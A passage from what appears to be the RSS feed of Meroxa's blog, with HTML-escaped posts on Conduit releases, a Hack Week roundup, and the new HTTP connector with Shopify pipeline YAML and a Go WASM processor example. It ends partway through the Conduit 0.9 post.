  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;generator
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Global settings&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;rate&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1000&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Collection &quot;users&quot; produces structured records with fields &quot;id&quot; and &quot;name&quot;.&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# All user records have the operation &apos;create&apos;.&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;collections.users.format.type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; structured
      &lt;span class=&quot;token key atrule&quot;&gt;collections.users.format.options.id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; int
      &lt;span class=&quot;token key atrule&quot;&gt;collections.users.format.options.name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; string
      &lt;span class=&quot;token key atrule&quot;&gt;collections.users.operations&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; create
      &lt;span class=&quot;token comment&quot;&gt;# Collection &quot;orders&quot; produces raw records with fields &quot;id&quot; and &quot;product&quot;.&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Order records have one of the specified operations chosen randomly.&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;collections.orders.format.type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; raw
      &lt;span class=&quot;token key atrule&quot;&gt;collections.orders.format.options.id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; int
      &lt;span class=&quot;token key atrule&quot;&gt;collections.orders.format.options.product&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; string
      &lt;span class=&quot;token key atrule&quot;&gt;collections.orders.operations&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; create&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;update&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;delete&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;📝 The ability to generate different operations for each record is also new in this release!&lt;/p&gt;
&lt;h2&gt;Bonus: Dynamic configuration parameters in connectors&lt;/h2&gt;
&lt;p&gt;With the latest release of the &lt;a href=&quot;https://github.com/conduitio/conduit-connector-sdk&quot;&gt;connector SDK&lt;/a&gt;, we introduced dynamic configuration parameters. A configuration parameter can now contain a wildcard in its name (&lt;code class=&quot;language-text&quot;&gt;*&lt;/code&gt;), which can be filled out in the pipeline configuration provided by the user.&lt;/p&gt;
&lt;p&gt;We already use this feature in the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;generator&lt;/a&gt; connector to specify multiple collections with separate formats. For instance, the configuration parameter &lt;code class=&quot;language-text&quot;&gt;collections.*.format.type&lt;/code&gt; can be provided multiple times, where &lt;code class=&quot;language-text&quot;&gt;*&lt;/code&gt; is replaced with the collection name. We also use it to configure a list of fields generated by the connector using the parameter &lt;code class=&quot;language-text&quot;&gt;collections.*.format.options.*&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; example
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;generator
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Global settings&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;rate&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1000&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Collection &quot;users&quot; produces structured records with fields &quot;id&quot; and &quot;name&quot;.&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;collections.users.format.type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; structured
      &lt;span class=&quot;token key atrule&quot;&gt;collections.users.format.options.id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; int
      &lt;span class=&quot;token key atrule&quot;&gt;collections.users.format.options.name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; string
      &lt;span class=&quot;token comment&quot;&gt;# Collection &quot;orders&quot; produces raw records with fields &quot;id&quot; and &quot;product&quot;.&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;collections.orders.format.type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; raw
      &lt;span class=&quot;token key atrule&quot;&gt;collections.orders.format.options.id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; int
      &lt;span class=&quot;token key atrule&quot;&gt;collections.orders.format.options.product&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; string&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You can start using this feature in your own connectors right away!&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;We’d love your feedback!&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Check out the full release notes on the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.10.0&quot;&gt;Conduit Changelog&lt;/a&gt;. What do you think about multiple collections and dynamic configuration parameters? Is there something you think would be great to have in Conduit? Start a &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions/&quot;&gt;GitHub Discussion&lt;/a&gt;, join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt;, or reach out via &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Inside Meroxa’s Hack Week: Pioneering Data Solutions with In-House Innovation]]></title><description><![CDATA[Discover the excitement of Hackweek! Dive into our latest blog post to explore innovative projects and creative breakthroughs from our most recent Hackweek. Learn how teams collaborate to turn bold ideas into reality, fostering a culture of innovation. Perfect for tech enthusiasts and creative thinkers alike!]]></description><link>https://meroxa.com/blog/inside-meroxas-hack-week-pioneering-data-solutions-with-in-house-innovation</link><guid isPermaLink="false">https://meroxa.com/blog/inside-meroxas-hack-week-pioneering-data-solutions-with-in-house-innovation</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 17 Apr 2024 04:38:15 GMT</pubDate><content:encoded>&lt;p&gt;Welcome to an insider’s view of Meroxa’s Hack Week, a time when our development team showcases its innovative prowess by utilizing our comprehensive data platform. This tradition not only highlights our team’s dedication to our product but also demonstrates the extensive possibilities that Meroxa unlocks for data ingestion, transformation, streaming, and orchestration.&lt;/p&gt;
&lt;h3&gt;The Essence of Hack Week at Meroxa&lt;/h3&gt;
&lt;p&gt;Hack Week at Meroxa is a celebration of our ability to blend technical expertise with creative innovation, developing applications that extend beyond our standard offerings. It is a period of intense exploration, learning, and boundary-pushing, which ultimately enhances our platform&apos;s capabilities.&lt;/p&gt;
&lt;h3&gt;Showcasing This Quarter’s Innovative Projects&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Conduit Connector Kafka Broker&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A standout project by Lovro introduced an experimental Kafka broker connector, enhancing our data integration capabilities by enabling direct data production from Kafka producers.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Disaster Recovery with Litestream&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Samir’s initiative started with scaling Pocketbase and evolved into utilizing Litestream for cutting-edge disaster recovery solutions, exemplifying Meroxa’s flexibility.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generic HTTP Connector for Conduit&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Maha identified and filled a crucial gap in our service offerings by developing a production-grade HTTP source and destination connector for Conduit, significantly advancing our connectivity solutions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Google Contacts Backup Tool&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Leveraging the new HTTP connector, Haris developed a tool for backing up Google Contacts, illustrating the practical applications of Meroxa’s platform for everyday data management challenges.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Realtime MLOps with Milvus and WASM Vector Embedding Processor&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;James used our Conduit Connector and Processor SDKs to build a real-time MLOps pipeline that transforms Postgres data into vector embeddings, showcasing the platform’s support for sophisticated data operations.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Facilitating Customer Proof of Concept Demos&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Anna’s work on tailored demos, integrating Clickhouse with Google Pub/Sub and Snowflake with Hubspot, demonstrates Meroxa’s capability to simplify data movement, which is essential for reverse ETL processes and aids sales efforts.&lt;/p&gt;
&lt;h3&gt;Inspiring the Future of Data Innovation&lt;/h3&gt;
&lt;p&gt;As we reflect on the achievements of this quarter’s Hack Week, we are inspired by the limitless possibilities within Meroxa. The projects highlighted are a source of inspiration for anyone looking to push the boundaries of data technology.&lt;/p&gt;
&lt;p&gt;Whether you are starting your data journey or looking to enhance your expertise, we invite you to sign up for a demo or join our Discord community to see how Meroxa is leading innovation in data solutions. Embrace the future of data with Meroxa and discover how our platform can empower your next project. Here’s to continuing to innovate and redefine the boundaries of what’s possible with data!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme?__hstc=259081301.6d5dc5950702ea18243d5eabeaba6872.1701109351374.1712530846514.1712964674930.42&amp;#x26;__hssc=259081301.1.1712964674930&amp;#x26;__hsfp=754967255&quot;&gt;Sign Up for a Demo&lt;/a&gt; | Join Our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; Community&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Introducing the New HTTP Connector for Conduit: Streamline Your Data Flow]]></title><description><![CDATA[Explore the capabilities of Meroxa's Conduit HTTP Connector, a robust tool designed to enhance data integration by facilitating seamless communication with any API endpoint. Perfect for developers and enterprises looking to streamline data workflows and maximize connectivity. Discover how our HTTP Connector can transform your data management strategy.]]></description><link>https://meroxa.com/blog/introducing-the-new-http-connector-for-conduit-streamline-your-data-flow</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-the-new-http-connector-for-conduit-streamline-your-data-flow</guid><dc:creator><![CDATA[Maha Hajja]]></dc:creator><pubDate>Fri, 12 Apr 2024 23:44:02 GMT</pubDate><content:encoded>&lt;p&gt;In the evolving landscape of data integration, staying ahead means continuously enhancing the versatility and effectiveness of our tools. That’s why we’re thrilled to announce the latest addition to Conduit: the HTTP Connector. This powerful &lt;a href=&quot;https://conduit.io/docs/introduction/vocabulary/#:~:text=around%20(destination%20connector).-,Connector%20plugin,-%2D%20sometimes%20also%20referred&quot;&gt;plugin&lt;/a&gt; not only broadens the scope of Conduit’s capabilities but also simplifies the process of pulling and pushing data over HTTP.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Why the HTTP Connector?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;A generic HTTP connector allows you to connect to any HTTP-based service or API. This flexibility is essential in modern software development, where systems often need to communicate with a wide range of external services, from internal APIs to third-party platforms.&lt;/p&gt;
&lt;p&gt;By having both the HTTP source and destination connectors, you can effortlessly transfer data from any Conduit source connector to an HTTP endpoint, and vice versa.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Building and Testing Made Simple&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Developed with ease of use in mind, building and testing the HTTP Connector is straightforward:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Download or Build&lt;/strong&gt;: Download the connector’s &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-http/releases/tag/v0.1.0&quot;&gt;release binary file&lt;/a&gt; that is ready to use, or use the simple &lt;code class=&quot;language-text&quot;&gt;make build&lt;/code&gt; command that compiles the connector from source, preparing it for integration into your Conduit pipeline.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Testing&lt;/strong&gt;: With &lt;code class=&quot;language-text&quot;&gt;make test&lt;/code&gt;, you can run through all the unit tests to ensure the connector functions correctly.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Source Connector: How It Works&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The source side of the HTTP Connector pulls data at regular intervals specified by the &lt;code class=&quot;language-text&quot;&gt;pollingPeriod&lt;/code&gt;. It’s smartly designed to enhance flexibility, allowing you to specify request methods (GET, HEAD, OPTIONS), headers, and parameters to tailor the data request to your needs. Particularly noteworthy is the use of the OPTIONS method, which appends the returned options directly to the record&apos;s metadata, enriching the data ingested into Conduit.&lt;/p&gt;
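&lt;p&gt;As a rough illustration (the exact metadata keys depend on the connector version and on the endpoint’s response, so treat this as a hypothetical sketch), a record ingested after an OPTIONS request might carry metadata along these lines:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{
  &quot;Allow&quot;: &quot;GET,HEAD,OPTIONS&quot;,
  &quot;Content-Type&quot;: &quot;application/json&quot;
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;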
&lt;p&gt;&lt;strong&gt;Configuration options&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;URL&lt;/strong&gt;: The endpoint from which data is fetched.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Method&lt;/strong&gt;: Choose from GET, HEAD, or OPTIONS to match the endpoint’s requirements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Headers&lt;/strong&gt; and &lt;strong&gt;Params&lt;/strong&gt;: Further customize your requests.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Polling Period&lt;/strong&gt;: Set how frequently the connector fetches data, with a default of every 5 minutes.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Using the HTTP source connector, you can pull data from any HTTP API and push it to any Conduit destination connector (see our &lt;a href=&quot;https://conduit.io/docs/connectors/connector-list/#connector-types&quot;&gt;Conduit connectors list&lt;/a&gt;). As an example, let’s build a pipeline that pulls orders from Shopify and pushes them into a file destination connector:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Pipeline Configuration File&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Create a folder called &lt;code class=&quot;language-text&quot;&gt;pipelines&lt;/code&gt; at the same level as your Conduit binary. Inside that folder, create a YAML file and copy these configurations over.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;version: 2.2
pipelines:
  - id: shopify-pipeline
    status: running
    connectors:
      - id: shopify-orders
        type: source
        plugin: standalone:http
        settings:
          url: https://cd8206-5c.myshopify.com/admin/api/2024-04/orders.json # your shopify API to get orders.
          headers: X-Shopify-Access-Token:${SHOPIFY_ACCESS_TOKEN} # reference to an env-var that has your access token.
          pollingPeriod: 30m # pull data from the URL every 30 minutes.
      - id: file-dest
        type: destination
        plugin: builtin:file
        settings:
          path: orders.txt
    processors:
      - id: decode-response
        # use a builtin processor that decodes the pulled data into JSON.
        plugin: json.decode
        settings:
          field: .Payload.After
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now run Conduit using &lt;code class=&quot;language-text&quot;&gt;./conduit&lt;/code&gt;, and see the magic!&lt;/p&gt;
&lt;p&gt;This pipeline will pull the Shopify orders from the API every 30 minutes, parse the response into JSON, and then write the orders into the destination file.&lt;/p&gt;
&lt;p&gt;Check &lt;a href=&quot;https://conduit.io/docs/pipeline-configuration-files/getting-started&quot;&gt;Pipeline Configuration Files&lt;/a&gt; for more details around the pipeline configuration files and how to run them.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Destination Connector: Pushing Data Forward&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;On the flip side, the destination connector takes data processed in Conduit and pushes it to the specified HTTP endpoint. Like its source counterpart, it allows for detailed configuration, including request methods suitable for creating or modifying resources (POST, PUT, DELETE, PATCH). This opens up a myriad of possibilities for integrating with APIs across the web.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Configuration options&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;URL&lt;/strong&gt;: The endpoint to which data is sent.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Method&lt;/strong&gt;: Supported methods include POST, PUT, DELETE, and PATCH, providing flexibility based on the API’s requirements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Body Manipulation&lt;/strong&gt;: Through Conduit&apos;s &lt;a href=&quot;https://conduit.io/docs/processors/builtin/&quot;&gt;built-in&lt;/a&gt; or &lt;a href=&quot;https://conduit.io/docs/processors/standalone/&quot;&gt;standalone&lt;/a&gt; processors, customize the data format to fit the destination&apos;s needs perfectly.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Using the HTTP destination connector, you can pull data from any Conduit source connector and push it to an HTTP API (see our &lt;a href=&quot;https://conduit.io/docs/connectors/connector-list/#connector-types&quot;&gt;Conduit connectors list&lt;/a&gt;). As an example, let’s build a pipeline that generates product records with a Generator source connector and pushes them into the Shopify API to add products:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Pipeline Configuration File&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Create a folder called &lt;code class=&quot;language-text&quot;&gt;pipelines&lt;/code&gt; at the same level as your Conduit binary. Inside that folder, create a YAML file and copy these configurations over.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;version: 2.2
pipelines:
  - id: shopify-pipeline
    status: running
    connectors:
      - id: generator-src
        type: source
        plugin: builtin:generator
        settings:
          format.type: structured
          format.options: &quot;title:string,body_html:string,vendor:string,product_type:string,status:string&quot;
          readTime: 1m # generate a new product every minute.
      - id: shopify-products
        type: destination
        plugin: standalone:http
        settings:
          url: https://cd8206-5c.myshopify.com/admin/api/2024-04/products.json # your shopify API to add products.
          headers: X-Shopify-Access-Token:${SHOPIFY_ACCESS_TOKEN} # reference to an env-var that has your access token.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Run Conduit using &lt;code class=&quot;language-text&quot;&gt;./conduit&lt;/code&gt; as we did in the last example, and notice the new products generated by the source and pushed to Shopify. Check &lt;a href=&quot;https://conduit.io/docs/pipeline-configuration-files/getting-started&quot;&gt;Pipeline Configuration Files&lt;/a&gt; for more details.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Seamless Integration with Your Data Ecosystem&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The HTTP Connector is more than just a plugin; it’s a gateway to integrating a vast array of web services and APIs directly into your data pipelines. Whether you’re aggregating data from multiple sources for analysis or updating external systems with processed data, the HTTP Connector streamlines these interactions, making your data workflows more efficient and effective.&lt;/p&gt;
&lt;p&gt;We invite you to explore the &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-http&quot;&gt;HTTP Connector&lt;/a&gt; and see firsthand how it can transform your data integration strategies. For more details about Conduit, visit &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;Conduit’s GitHub page&lt;/a&gt;. To get in touch, join our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; server and let us know if you have any questions.&lt;/p&gt;
&lt;p&gt;Stay tuned for more updates as we continue to enhance Conduit, making it the most versatile and user-friendly data integration platform available. &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme?__hstc=259081301.6d5dc5950702ea18243d5eabeaba6872.1701109351374.1712530846514.1712964674930.42&amp;#x26;__hssc=259081301.1.1712964674930&amp;#x26;__hsfp=754967255&quot;&gt;Sign up for a demo&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;</content:encoded></item><item><title><![CDATA[Introducing Conduit 0.9: Revolutionizing Data Processing]]></title><description><![CDATA[Discover the revolutionary Conduit 0.9 update, enhancing data processing with standalone processors and advanced capabilities for seamless manipulation and efficiency. Explore now.]]></description><link>https://meroxa.com/blog/introducing-conduit-0.9-revolutionizing-data-processing-with-enhanced-processors</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-conduit-0.9-revolutionizing-data-processing-with-enhanced-processors</guid><dc:creator><![CDATA[Simon Lawrence]]></dc:creator><pubDate>Fri, 22 Mar 2024 16:19:19 GMT</pubDate><content:encoded>&lt;p&gt;We&apos;re thrilled to unveil the latest version of Conduit! This update, Conduit 0.9, marks a significant milestone in our journey, offering more flexibility and power in data processing than ever before. The development of this release focused on incorporating valuable user feedback, particularly around enhancing processor functionality, to provide a seamless and more efficient experience.&lt;/p&gt;
&lt;h2&gt;Elevating Data Processing with Advanced Processor Capabilities&lt;/h2&gt;
&lt;p&gt;In previous versions of Conduit, manipulating records was confined to our built-in processors or custom code within the pipeline configuration file, using a JavaScript processor. This approach, while functional, was not the most user-friendly or flexible. Taking your feedback to heart, we&apos;ve completely overhauled our processor framework in Conduit 0.9, introducing support for standalone processors. This update opens up new possibilities for data manipulation, allowing you to write custom processors in the language of your choice, thanks to our new support for Web Assembly (WASM) processors.&lt;/p&gt;
&lt;h3&gt;Introducing Web Assembly Processors for Flexible Data Processing&lt;/h3&gt;
&lt;p&gt;The flexibility to process data with Web Assembly Processors is a game-changer. For instance, utilizing Go with our new &lt;a href=&quot;https://github.com/ConduitIO/conduit-processor-sdk&quot;&gt;conduit-processor-sdk&lt;/a&gt; allows for unprecedented adaptability in processing methods. However, the choice of language is yours, with options like C#, Rust, or Kotlin—all compatible with Web Assembly. For a deeper dive into implementing standalone processors, our &lt;a href=&quot;https://conduit.io/docs/processors/standalone/how-it-works&quot;&gt;&quot;How it works&quot;&lt;/a&gt; guide provides comprehensive insights.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Example: Creating a Simple Processor in Go&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Below is a straightforward example of a Go-based processor. This custom processor adds a &lt;code class=&quot;language-text&quot;&gt;processed&lt;/code&gt; field to each record, showcasing the ease of enhancing data with Conduit 0.9.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;//go:build wasm

package main

import (
    &quot;context&quot;

    &quot;github.com/conduitio/conduit-commons/opencdc&quot;
    sdk &quot;github.com/conduitio/conduit-processor-sdk&quot;
)

func main() {
    sdk.Run(sdk.NewProcessorFunc(
        sdk.Specification{Name: &quot;simple-processor&quot;, Version: &quot;v1.0.0&quot;},
        func(ctx context.Context, record opencdc.Record) (opencdc.Record, error) {
            record.Payload.After.(opencdc.StructuredData)[&quot;processed&quot;] = true
            return record, nil
        },
    ))
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Compiling our New Processor&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;After writing your processor, a simple compilation step prepares it for integration into your Conduit pipeline. The process involves setting specific environment variables so that the Go compiler targets WASM: &lt;code class=&quot;language-text&quot;&gt;GOARCH=wasm GOOS=wasip1&lt;/code&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;GOARCH=wasm GOOS=wasip1 go build -o simple-processor.wasm main.go    &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once compiled, your &lt;code class=&quot;language-text&quot;&gt;simple-processor.wasm&lt;/code&gt; is ready to be deployed within Conduit by copying it to the &lt;code class=&quot;language-text&quot;&gt;./processors&lt;/code&gt; directory next to your &lt;code class=&quot;language-text&quot;&gt;conduit&lt;/code&gt; binary.&lt;/p&gt;
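&lt;p&gt;For reference, the resulting directory layout would look roughly like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;.
├── conduit
└── processors
    └── simple-processor.wasm
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;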
&lt;p&gt;&lt;strong&gt;Using our new processor in a pipeline&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Utilizing the new processor involves referencing it within your Conduit pipeline configuration, as demonstrated in our example layout.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Simple-Processor@2x.png&quot; alt=&quot;Simple-Processor@2x&quot;&gt;&lt;/p&gt;
&lt;p&gt;We’ll have the generator connector create records with the form:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{
  &quot;addr&quot;: &quot;string c5c5d54b-e380-48e0-b24b-444b760a66f3&quot;,
  &quot;id&quot;: 1884616843,
  &quot;name&quot;: &quot;string 246def2a-ac48-416c-b3e7-01fcb77c52a2&quot;,
  &quot;zip&quot;: &quot;string 2f1f462e-1dfa-4066-a1d7-03370227d672&quot;
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Our processor will add a new &lt;code class=&quot;language-text&quot;&gt;processed&lt;/code&gt; field and then we’ll write that out to a file.&lt;/p&gt;
&lt;p&gt;Here’s the Conduit pipeline configuration file for actually creating the pipeline in Conduit.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;version: 2.2
pipelines:
  - id: gen-to-file
    status: running
    description: &quot;A demo pipeline with wasm processor&quot;
    connectors:
      - id: source-generator
        type: source
        plugin: builtin:generator
        name: gen-source
        settings:
          recordCount: &apos;3&apos;
          format.type: structured
          format.options: id:int,name:string,addr:string,zip:string
      - id: example.out
        type: destination
        plugin: builtin:file
        settings:
          path: ./example.out
    processors:
      - id: add-processed-field
        plugin: standalone:simple-processor
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You can see the new processor referenced in the processors section of the pipeline.yaml:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;processors:
  - id: add-processed-field
    plugin: standalone:simple-processor
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When we start Conduit and check the &lt;code class=&quot;language-text&quot;&gt;./example.out&lt;/code&gt; file, we can see the processed records with the newly added &lt;code class=&quot;language-text&quot;&gt;&quot;processed&quot;&lt;/code&gt; field.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Not Just Standalone: Improvements to Built-in Processors&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The introduction of standalone processors isn&apos;t the only highlight of Conduit 0.9. We&apos;ve also made substantial enhancements to our built-in processors, making them more robust and user-friendly.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Exploring the Enhanced Built-in Processors&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Here’s an example of a pipeline that uses two built-in processors. One processor removes a field and the other adds metadata to the record.&lt;/p&gt;
